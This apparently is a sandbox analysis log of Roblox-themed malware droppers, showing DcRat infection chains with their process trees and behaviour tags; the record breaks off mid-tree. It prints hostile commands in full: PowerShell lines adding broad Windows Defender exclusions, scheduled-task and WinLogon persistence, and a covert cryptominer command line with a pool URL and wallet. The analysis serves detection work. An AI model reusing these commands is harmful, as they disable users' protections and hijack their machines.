C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1728,5890545263886260941,13795001511502530143,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5188 /prefetch:85⤵PID:4016
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1728,5890545263886260941,13795001511502530143,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5320 /prefetch:85⤵PID:5256
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1728,5890545263886260941,13795001511502530143,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5840 /prefetch:85⤵PID:1912
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1728,5890545263886260941,13795001511502530143,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=5628 /prefetch:25⤵PID:4380
-
-
-
C:\Users\Admin\AppData\Local\Temp\Solara.Dir\cd57e4c171d6e8f5ea8b8f824a6a7316.exe"C:\Users\Admin\AppData\Local\Temp\Solara.Dir\cd57e4c171d6e8f5ea8b8f824a6a7316.exe"4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Loads dropped DLL
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:3372 -
C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe"C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe" --embedded-browser-webview=1 --webview-exe-name=cd57e4c171d6e8f5ea8b8f824a6a7316.exe --webview-exe-version=1.0.0.0 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\Solara.Dir\cd57e4c171d6e8f5ea8b8f824a6a7316.exe.WebView2\EBWebView" --no-default-browser-check --disable-component-extensions-with-background-pages --no-first-run --disable-default-apps --noerrdialogs --embedded-browser-webview-dpi-awareness=1 --disable-popup-blocking --internet-explorer-integration=none --js-flags="--harmony-weak-refs-with-cleanup-some --expose-gc" --mojo-named-platform-channel-pipe=3372.1692.64774687413602266815⤵
- Enumerates system info in registry
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
PID:5772 -
C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe"C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\Solara.Dir\cd57e4c171d6e8f5ea8b8f824a6a7316.exe.WebView2\EBWebView /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\Solara.Dir\cd57e4c171d6e8f5ea8b8f824a6a7316.exe.WebView2\EBWebView\Crashpad --metrics-dir=C:\Users\Admin\AppData\Local\Temp\Solara.Dir\cd57e4c171d6e8f5ea8b8f824a6a7316.exe.WebView2\EBWebView --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe" --annotation=plat=Win64 "--annotation=prod=Edge WebView2" --annotation=ver=90.0.818.66 --initial-client-data=0x104,0x108,0x10c,0xe0,0x1fc,0x7ffe98b73cb8,0x7ffe98b73cc8,0x7ffe98b73cd86⤵PID:5644
-
-
C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe"C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe" --type=gpu-process --field-trial-handle=1944,14418166984334420509,12288332412312571531,131072 --enable-features=ForwardMemoryPressureEventsToGpuProcess,UseSwapChainsInSoftware --disable-features=FilterAdsOnAbusiveSites,SpareRendererForSitePerProcess,WebPayments,msApplicationGuard,msAutomaticTabFreeze,msBrowserSettingsSupported,msEdgeFaviconService,msEdgeLinkDoctor,msEdgeMGPFrev1,msEdgeOnRampFRE,msEdgeOnRampImport,msEdgeReadingView,msEdgeSettingsImport,msEdgeSettingsImportV2,msEdgeShoppingUI,msEdgeTranslate,msEdgeUseCaptivePortalService,msImplicitSignin,msPasswordBreachDetection,msReadAloud,msRevokeExtensions,msSendClientDataHeader,msSendClientDataHeaderToEdgeServices,msSyncEdgeCollections,msUseLabelingService,msWebAssistHistorySearch --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Temp\Solara.Dir\cd57e4c171d6e8f5ea8b8f824a6a7316.exe.WebView2\EBWebView" --webview-exe-name=cd57e4c171d6e8f5ea8b8f824a6a7316.exe --webview-exe-version=1.0.0.0 --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=1 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1956 /prefetch:26⤵PID:4060
-
-
C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe"C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1944,14418166984334420509,12288332412312571531,131072 --enable-features=ForwardMemoryPressureEventsToGpuProcess,UseSwapChainsInSoftware --disable-features=FilterAdsOnAbusiveSites,SpareRendererForSitePerProcess,WebPayments,msApplicationGuard,msAutomaticTabFreeze,msBrowserSettingsSupported,msEdgeFaviconService,msEdgeLinkDoctor,msEdgeMGPFrev1,msEdgeOnRampFRE,msEdgeOnRampImport,msEdgeReadingView,msEdgeSettingsImport,msEdgeSettingsImportV2,msEdgeShoppingUI,msEdgeTranslate,msEdgeUseCaptivePortalService,msImplicitSignin,msPasswordBreachDetection,msReadAloud,msRevokeExtensions,msSendClientDataHeader,msSendClientDataHeaderToEdgeServices,msSyncEdgeCollections,msUseLabelingService,msWebAssistHistorySearch --lang=en-US --service-sandbox-type=none --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Temp\Solara.Dir\cd57e4c171d6e8f5ea8b8f824a6a7316.exe.WebView2\EBWebView" --webview-exe-name=cd57e4c171d6e8f5ea8b8f824a6a7316.exe --webview-exe-version=1.0.0.0 --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=1 --mojo-platform-channel-handle=2004 /prefetch:36⤵PID:2500
-
-
C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe"C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1944,14418166984334420509,12288332412312571531,131072 --enable-features=ForwardMemoryPressureEventsToGpuProcess,UseSwapChainsInSoftware --disable-features=FilterAdsOnAbusiveSites,SpareRendererForSitePerProcess,WebPayments,msApplicationGuard,msAutomaticTabFreeze,msBrowserSettingsSupported,msEdgeFaviconService,msEdgeLinkDoctor,msEdgeMGPFrev1,msEdgeOnRampFRE,msEdgeOnRampImport,msEdgeReadingView,msEdgeSettingsImport,msEdgeSettingsImportV2,msEdgeShoppingUI,msEdgeTranslate,msEdgeUseCaptivePortalService,msImplicitSignin,msPasswordBreachDetection,msReadAloud,msRevokeExtensions,msSendClientDataHeader,msSendClientDataHeaderToEdgeServices,msSyncEdgeCollections,msUseLabelingService,msWebAssistHistorySearch --lang=en-US --service-sandbox-type=utility --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Temp\Solara.Dir\cd57e4c171d6e8f5ea8b8f824a6a7316.exe.WebView2\EBWebView" --webview-exe-name=cd57e4c171d6e8f5ea8b8f824a6a7316.exe --webview-exe-version=1.0.0.0 --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=1 --mojo-platform-channel-handle=2420 /prefetch:86⤵PID:4148
-
-
C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe"C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe" --type=renderer --js-flags="--harmony-weak-refs-with-cleanup-some --expose-gc" --field-trial-handle=1944,14418166984334420509,12288332412312571531,131072 --enable-features=ForwardMemoryPressureEventsToGpuProcess,UseSwapChainsInSoftware --disable-features=FilterAdsOnAbusiveSites,SpareRendererForSitePerProcess,WebPayments,msApplicationGuard,msAutomaticTabFreeze,msBrowserSettingsSupported,msEdgeFaviconService,msEdgeLinkDoctor,msEdgeMGPFrev1,msEdgeOnRampFRE,msEdgeOnRampImport,msEdgeReadingView,msEdgeSettingsImport,msEdgeSettingsImportV2,msEdgeShoppingUI,msEdgeTranslate,msEdgeUseCaptivePortalService,msImplicitSignin,msPasswordBreachDetection,msReadAloud,msRevokeExtensions,msSendClientDataHeader,msSendClientDataHeaderToEdgeServices,msSyncEdgeCollections,msUseLabelingService,msWebAssistHistorySearch --lang=en-US --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Temp\Solara.Dir\cd57e4c171d6e8f5ea8b8f824a6a7316.exe.WebView2\EBWebView" --webview-exe-name=cd57e4c171d6e8f5ea8b8f824a6a7316.exe --webview-exe-version=1.0.0.0 --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=1 --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2960 /prefetch:16⤵PID:1848
-
-
C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe"C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1944,14418166984334420509,12288332412312571531,131072 --enable-features=ForwardMemoryPressureEventsToGpuProcess,UseSwapChainsInSoftware --disable-features=FilterAdsOnAbusiveSites,SpareRendererForSitePerProcess,WebPayments,msApplicationGuard,msAutomaticTabFreeze,msBrowserSettingsSupported,msEdgeFaviconService,msEdgeLinkDoctor,msEdgeMGPFrev1,msEdgeOnRampFRE,msEdgeOnRampImport,msEdgeReadingView,msEdgeSettingsImport,msEdgeSettingsImportV2,msEdgeShoppingUI,msEdgeTranslate,msEdgeUseCaptivePortalService,msImplicitSignin,msPasswordBreachDetection,msReadAloud,msRevokeExtensions,msSendClientDataHeader,msSendClientDataHeaderToEdgeServices,msSyncEdgeCollections,msUseLabelingService,msWebAssistHistorySearch --lang=en-US --service-sandbox-type=none --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Temp\Solara.Dir\cd57e4c171d6e8f5ea8b8f824a6a7316.exe.WebView2\EBWebView" --webview-exe-name=cd57e4c171d6e8f5ea8b8f824a6a7316.exe --webview-exe-version=1.0.0.0 --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=1 --mojo-platform-channel-handle=4800 /prefetch:86⤵PID:3376
-
-
C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe"C:\Program Files (x86)\Microsoft\EdgeWebView\Application\90.0.818.66\msedgewebview2.exe" --type=gpu-process --field-trial-handle=1944,14418166984334420509,12288332412312571531,131072 --enable-features=ForwardMemoryPressureEventsToGpuProcess,UseSwapChainsInSoftware --disable-features=FilterAdsOnAbusiveSites,SpareRendererForSitePerProcess,WebPayments,msApplicationGuard,msAutomaticTabFreeze,msBrowserSettingsSupported,msEdgeFaviconService,msEdgeLinkDoctor,msEdgeMGPFrev1,msEdgeOnRampFRE,msEdgeOnRampImport,msEdgeReadingView,msEdgeSettingsImport,msEdgeSettingsImportV2,msEdgeShoppingUI,msEdgeTranslate,msEdgeUseCaptivePortalService,msImplicitSignin,msPasswordBreachDetection,msReadAloud,msRevokeExtensions,msSendClientDataHeader,msSendClientDataHeaderToEdgeServices,msSyncEdgeCollections,msUseLabelingService,msWebAssistHistorySearch --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Temp\Solara.Dir\cd57e4c171d6e8f5ea8b8f824a6a7316.exe.WebView2\EBWebView" --webview-exe-name=cd57e4c171d6e8f5ea8b8f824a6a7316.exe --webview-exe-version=1.0.0.0 --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=1 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=4832 /prefetch:26⤵PID:1784
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\solara.exe"C:\Users\Admin\AppData\Local\Temp\solara.exe"3⤵
- Executes dropped EXE
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:2680 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\aImCrmZyeD77A2ANdrk.vbe"4⤵
- Suspicious use of WriteProcessMemory
PID:2948 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\4F0VCIGGZPxdNa.bat" "5⤵
- Suspicious use of WriteProcessMemory
PID:4192 -
C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe"C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe"6⤵
- Modifies WinLogon for persistence
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Program Files directory
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2944 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe'7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1880
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\winNet\winlogon.exe'7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1260
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default\SendTo\sppsvc.exe'7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5072
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Internet Explorer\Registry.exe'7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2588
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Microsoft.NET\RedistList\wscript.exe'7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5016
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\winNet\explorer.exe'7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1528
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\IdentityCRL\INT\backgroundTaskHost.exe'7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2232
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Java\jdk-1.8\include\win32\bridge\System.exe'7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4504
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows NT\TableTextService\en-US\dllhost.exe'7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4860
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\winNet\csrss.exe'7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5108
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Microsoft Office\PackageManifests\spoolsv.exe'7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2240
-
-
C:\Program Files\Internet Explorer\Registry.exe"C:\Program Files\Internet Explorer\Registry.exe"7⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
PID:988
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\DCRatBuild.exe"C:\Users\Admin\AppData\Local\Temp\DCRatBuild.exe"2⤵
- DcRat
- Executes dropped EXE
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:2756 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\winNet\we9fgyC144zVOkGk.vbe"3⤵PID:4576
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\winNet\rsH0xIUsPk2E2Mq2a4QwbDGWD6K8lz.bat" "4⤵PID:1684
-
C:\winNet\ComContainerbrowserRefRuntime.exe"C:\winNet/ComContainerbrowserRefRuntime.exe"5⤵
- Executes dropped EXE
- Drops file in Windows directory
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5180 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\VESsa4Q6e5.bat"6⤵PID:2948
-
C:\Windows\system32\chcp.comchcp 650017⤵PID:3272
-
-
C:\Windows\system32\w32tm.exew32tm /stripchart /computer:localhost /period:5 /dataonly /samples:27⤵PID:1856
-
-
C:\Windows\LiveKernelReports\conhost.exe"C:\Windows\LiveKernelReports\conhost.exe"7⤵
- Executes dropped EXE
- Suspicious behavior: GetForegroundWindowSpam
PID:5764
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Bloxstrap.exe"C:\Users\Admin\AppData\Local\Temp\Bloxstrap.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:976 -
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\Bloxstrap.exe"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5868 -
C:\Windows\System32\cmd.exe"cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit4⤵PID:5916
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5964
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:776
-
-
-
C:\Windows\System32\cmd.exe"cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "Bloxstrap" /tr "C:\Users\Admin\Bloxstrap.exe"4⤵PID:6076
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "Bloxstrap" /tr "C:\Users\Admin\Bloxstrap.exe"5⤵
- DcRat
- Scheduled Task/Job: Scheduled Task
PID:6116
-
-
-
C:\Windows\System32\cmd.exe"cmd" cmd /c "C:\Users\Admin\Bloxstrap.exe"4⤵PID:6136
-
C:\Users\Admin\Bloxstrap.exeC:\Users\Admin\Bloxstrap.exe5⤵
- Executes dropped EXE
PID:568 -
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Users\Admin\Bloxstrap.exe"6⤵
- Suspicious use of SetThreadContext
PID:3956 -
C:\Windows\System32\cmd.exe"cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit7⤵PID:5692
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV18⤵PID:5912
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"8⤵
- Command and Scripting Interpreter: PowerShell
PID:5792
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"8⤵
- Command and Scripting Interpreter: PowerShell
PID:4652
-
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"7⤵
- Executes dropped EXE
PID:2064 -
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "/sihost64"8⤵PID:5992
-
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=pool.hashvault.pro:80 --user=43a4sKqYaYRDJ11nnS8kk6ATe7pwz7GqaGCjueKKVcqS8V7ZgQduYQSENk7PRNr1FjgxF7TADqsRBjA5cMsYJeovSPcRAnK --pass=x --cpu-max-threads-hint=30 --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-idle-wait=2 --cinit-idle-cpu=90 --tls --cinit-stealth7⤵PID:5960
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Frage build.exe"C:\Users\Admin\AppData\Local\Temp\Frage build.exe"2⤵
- Executes dropped EXE
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:1592 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\DriversavessessionDlldhcp\ghJPtatrYDLygnNWh9dEZv.vbe"3⤵PID:1236
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\DriversavessessionDlldhcp\exFbRiwQoowToPhSTKSA9iYE.bat" "4⤵PID:2304
-
C:\DriversavessessionDlldhcp\Roblox.exe"C:\DriversavessessionDlldhcp/Roblox.exe"5⤵
- Modifies WinLogon for persistence
- Executes dropped EXE
- Adds Run key to start application
- Modifies registry class
PID:4196 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\40szjpr3\40szjpr3.cmdline"6⤵PID:3328
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESFAAC.tmp" "c:\winNet\CSC2D3D11311BB1459C859E705AB2291E36.TMP"7⤵PID:3540
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\nkt11ugp\nkt11ugp.cmdline"6⤵PID:5276
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESFBA6.tmp" "c:\Users\Default\SendTo\CSC298B554BE48545D7BEFA9E2BA0C5075.TMP"7⤵PID:5356
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\crwrxth2\crwrxth2.cmdline"6⤵PID:132
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESFC90.tmp" "c:\Program Files\Internet Explorer\CSC74179172C5254D7BA93F433CC1975B61.TMP"7⤵PID:5100
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\hyyii5l4\hyyii5l4.cmdline"6⤵PID:3416
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESFDA9.tmp" "c:\Program Files (x86)\Microsoft.NET\RedistList\CSCE7785059AA1B4EE2B6E69A4DEAA7E1DF.TMP"7⤵PID:1224
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\yqdx0oev\yqdx0oev.cmdline"6⤵PID:5352
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESFED2.tmp" "c:\winNet\CSCB210A7B3F9DB43EE896F5193545CE4F.TMP"7⤵PID:5552
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ggmdvj0p\ggmdvj0p.cmdline"6⤵
- Drops file in Windows directory
PID:1204 -
